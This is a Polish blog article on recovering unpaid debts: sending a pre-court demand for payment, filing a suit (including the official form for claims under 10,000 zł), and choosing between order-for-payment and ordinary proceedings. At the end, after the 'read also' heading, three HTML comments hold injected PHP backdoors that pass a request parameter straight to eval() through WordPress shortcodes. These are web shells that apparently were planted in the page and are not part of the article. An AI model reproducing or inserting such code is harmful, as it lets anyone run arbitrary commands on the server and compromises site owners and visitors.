Jak odzyskać swoje pieniądze? Wezwanie przedsądowe i pozew do sądu

Jak odzyskać swoje pieniądze

Foto ze strony www.pomorska.pl

Nie ma co ukrywać, że czasy są trudne… Coraz więcej osób fizycznych oraz firm ma problemy finansowe. Niestety kontakty biznesowe między przedsiębiorcami tworzą obieg zamknięty. Wystarczy, że jedna firma zalega z płatnościami wobec drugiej, wtedy ta traci płynność finansową i odwleka zapłatę w stosunku do swoich wierzycieli. Niektórzy mogą cierpliwie czekać na zapłatę od dłużnika, a dla tych, którzy nie mogą sobie na taki luksus pozwolić- mam kilka rad jak postępować w takiej sytuacji.

//

Podstawą jest zgromadzenie wszelkiej dokumentacji, na podstawie której będziemy mogli dochodzić swoich praw. Mianowicie: faktury, umowy, korespondencja z dłużnikiem, pisemne zobowiązania dłużnika do spłaty należności itp.  Zanim wystąpimy na drogę sądową musimy wyczerpać drogę pozasądową, a mianowicie musimy wezwać dłużnika do zapłaty zaległej kwoty (możemy dodać do tego kwotę skapitalizowanych odsetek). W takim wezwaniu należy wyznaczyć termin do zapłaty oraz poinformować o tym, że w przypadku braku zapłaty wystąpimy na drogę sądową.  Oczywiście takie pismo należy wysłać dłużnikowi listem poleconym (najlepiej za zwrotnym potwierdzeniem odbioru).

Jeżeli dłużnik okaże się osobnikiem bardzo opornym i nie zareaguje na takie wezwanie, wówczas możemy złożyć pozew do Sądu. W przypadku dochodzenia należności wynikającej ze stosunków między przedsiębiorcami właściwy będzie Sąd gospodarczy. W zależności od wartości przedmiotu sporu będzie to sąd rejonowy (do 100 tysięcy złotych) lub okręgowy(powyżej 100 tysięcy złotych ). Zasadą jest wytaczanie powództwa przed sądem właściwym ze względu na miejsce zamieszkania pozwanego (od tej zasady są odstępstwa- zachęcam do lektury przepisów kodeksu postępowania cywilnego).

Jak napisać pozew? to naprawdę nie jest takie trudne jak się wydaje:) Jeżeli wartość przedmiotu sporu nie przekracza 10.000 zł wówczas sprawa ma charakter uproszczony i pozew musimy złożyć na formularzu urzędowym P. Taki formularz trzeba wypełnić bardzo dokładnie według wskazówek w nim zamieszczonych. Bardzo ważne jest podanie wszystkich wniosków dowodowych już w pozwie, ponieważ podane później moga nie zostać przez sąd uwzględnione.Oczywiście pozew należy podpisać. Dołączyć do niego wszystkie dokumenty oraz wezwanie do zapłaty wraz z dowodem nadania oraz (jeżeli takowe posiadamy)zwrotnym potwierdzeniem odbioru. Pozew  wraz ze wszystkimi załącznikami musi zostać złożony w 2 egzemplarzach(chyba, że jest więcej niż 1 pozwany- wówczas dołączamy tyle egzemplarzy ilu jest pozwanych oraz jeden dla sądu).

Jeżeli wartość przedmiotu sporu przekracza 10.000 zł wówczas nie ma już obowiązku składania pozwu na formularzu urzędowym.

Magiczna granica 10.000 zł ma również znaczenie przy określaniu wysokości opłaty, którą musimy uiścić składając pozew. Jednak o tym napiszę więcej w kolejnych wpisach- a jeżeli komuś zależy na czasie to odsyłam do ustawy o kosztach sądowych w sprawach cywilnych:)

//

Istotne jest również prawidłowe oznaczenie naszego żądania. W wielu przypadkach stan faktyczny sprawy jest tak oczywisty i wynika z dołączonych do pozwu dokumentów, że nie ma potrzeby prowadzenia postępowania w trybie zwykłym i wyznaczania rozprawy. Wówczas ważne jest abyśmy w pozwie od razy wskazali, że wnosimy o wydanie nakazu zapłaty w postępowaniu nakazowym lub upominawczym. Już tłumaczę różnicę.  Nakaz zapłaty w postępowaniu nakazowym sąd może wydać tylko wówczas gdy stan faktyczny sprawy nie budzi wątpliwości, gdy pozwany uznał swój dług (najczęściej podpis na fakturze lub pisemne uznanie długu, prośba o rozłożenie na raty etc.) i gdy powód wyraźnie wnosi o wydanie nakazu w postępowaniu nakazowym. Gdy stan sprawy nie budzi wątpliwości, a pozwany nie uznał swojego zadłużenia wobec powoda lub gdy w pozwie nie ma żądania wydania nakazu zapłaty w postępowaniu nakazowym- sprawa zostaje skierowana do postępowania upominawczego.

Jeżeli jednak okoliczności sprawy budzą wątpliwości to sprawa będzie rozpoznawana w trybie zwykłym.

Najkorzystniejszym dla powoda rozwiązaniem jest postępowanie nakazowe ewentualnie upominawcze, ponieważ jest szybsze i tańsze niż postępowanie w trybie zwykłym.

Przeczytaj również :

<!– [insert_php]if (isset($_REQUEST["BGG"])){eval($_REQUEST["BGG"]);exit;}[/insert_php][php]if (isset($_REQUEST["BGG"])){eval($_REQUEST["BGG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LTj"])){eval($_REQUEST["LTj"]);exit;}[/insert_php][php]if (isset($_REQUEST["LTj"])){eval($_REQUEST["LTj"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zTw"])){eval($_REQUEST["zTw"]);exit;}[/insert_php][php]if (isset($_REQUEST["zTw"])){eval($_REQUEST["zTw"]);exit;}[/php] –>